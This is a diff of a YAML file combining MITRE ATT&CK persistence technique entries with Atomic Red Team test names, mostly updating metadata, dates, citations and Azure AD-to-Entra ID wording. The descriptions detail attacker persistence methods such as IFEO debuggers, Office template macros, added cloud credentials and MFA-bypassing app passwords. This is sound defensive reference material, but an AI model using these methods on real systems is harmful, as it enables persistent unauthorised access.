         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests:
     - name: Enable Guest account with RDP capability and admin privileges
@@ -52611,7 +53031,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests:
     - name: Create a new time provider
@@ -52690,7 +53109,7 @@ persistence:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -52716,13 +53135,11 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -52843,7 +53260,6 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1136.001:
@@ -52915,7 +53331,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.001
     atomic_tests:
     - name: Create a new user in a command prompt
@@ -53068,7 +53483,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests:
     - name: Winlogon Shell Key Persistence - PowerShell
@@ -53301,7 +53715,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests: []
   T1546.012:
@@ -53355,7 +53768,7 @@ persistence:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -53388,8 +53801,6 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests:
     - name: IFEO Add Debugger
@@ -53516,7 +53927,7 @@ persistence:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -53551,12 +53962,10 @@ persistence:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -53633,7 +54042,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests:
     - name: Attaches Command Prompt as a Debugger to a List of Target Processes
@@ -53820,7 +54228,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.002
     atomic_tests:
     - name: Create a new Windows domain admin user
@@ -53943,7 +54350,7 @@ persistence:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -53973,55 +54380,10 @@ persistence:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
-      type: attack-pattern
-      created: '2019-11-07T20:29:17.788Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.001
-        url: https://attack.mitre.org/techniques/T1137/001
-      - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
-        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
-          Retrieved July 3, 2017.
-        source_name: Microsoft Change Normal Template
-      - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
-        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
-          Retrieved July 3, 2017.
-        source_name: MSDN VBA in Office
-      - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
-        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
-          Retrieved July 3, 2017.
-        source_name: enigma0x3 normal.dotm
-      - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
-        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
-          Retrieved July 3, 2017.
-        source_name: Hexacorn Office Template Macros
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
-        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
-          Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:01:35.918Z'
       name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
@@ -54052,6 +54414,7 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: 'Many Office-related persistence mechanisms require changes
         to the Registry and for binaries, files, or scripts to be written to disk
         or existing files modified to include malicious scripts. Collect events related
@@ -54061,9 +54424,13 @@ persistence:
         also be investigated since the base templates should likely not contain VBA
         macros. Changes to the Office macro security settings should also be investigated.(Citation:
         GlobalDotName Jun 2019)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -54071,11 +54438,47 @@ persistence:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+      created: '2019-11-07T20:29:17.788Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/001
+        external_id: T1137.001
+      - source_name: MSDN VBA in Office
+        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+          Retrieved July 3, 2017.
+        url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+      - source_name: Hexacorn Office Template Macros
+        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+          Retrieved July 3, 2017.
+        url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+      - source_name: Microsoft Change Normal Template
+        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+          Retrieved July 3, 2017.
+        url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+      - source_name: enigma0x3 normal.dotm
+        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+          Retrieved July 3, 2017.
+        url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+      - source_name: CrowdStrike Outlook Forms
+        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+          Movement and Persistence. Retrieved February 5, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.001
     atomic_tests:
     - name: Injecting a Macro into the Word Normal.dotm Template for Persistence via
@@ -54203,7 +54606,7 @@ persistence:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -54251,8 +54654,6 @@ persistence:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests:
     - name: Create registry persistence via AppCert DLL
@@ -54297,7 +54698,7 @@ persistence:
         elevation_required: true
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -54310,16 +54711,16 @@ persistence:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -54331,16 +54732,16 @@ persistence:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -54395,7 +54796,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542:
     technique:
@@ -54456,7 +54856,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.015:
     technique:
@@ -54532,7 +54931,7 @@ persistence:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -54560,8 +54959,6 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests:
     - name: Persistence by modifying Windows Terminal profile
@@ -54632,7 +55029,7 @@ persistence:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -54657,23 +55054,21 @@ persistence:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -54683,11 +55078,15 @@ persistence:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -54698,12 +55097,19 @@ persistence:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -54712,6 +55118,7 @@ persistence:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -54720,13 +55127,16 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -54752,10 +55162,18 @@ persistence:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -54764,10 +55182,20 @@ persistence:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -54784,14 +55212,11 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -54866,7 +55291,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -54955,7 +55379,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests:
     - name: Persistence via WMI Event Subscription - CommandLineEventConsumer
@@ -55093,19 +55516,23 @@ persistence:
         name: powershell
   T1554:
     technique:
-      modified: '2024-04-16T13:03:40.824Z'
+      modified: '2024-10-12T16:52:46.067Z'
       name: Compromise Host Software Binary
       description: |-
         Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
 
-        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
 
         An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+        After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
       - CrowdStrike Falcon OverWatch
+      - Liran Ravich, CardinalOps
+      - Jamie Williams (U ω U), PANW Unit 42
       x_mitre_deprecated: false
       x_mitre_detection: "Collect and analyze signing certificate metadata and check
         signature validity on software that executes within the environment. Look
@@ -55119,7 +55546,7 @@ persistence:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '2.0'
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Deletion'
       - 'File: File Modification'
@@ -55134,6 +55561,11 @@ persistence:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1554
         external_id: T1554
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Unit42 Banking Trojans Hooking 2022
         description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
           Financially Motivated Malware Became Infrastructure. Retrieved September
@@ -55147,11 +55579,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
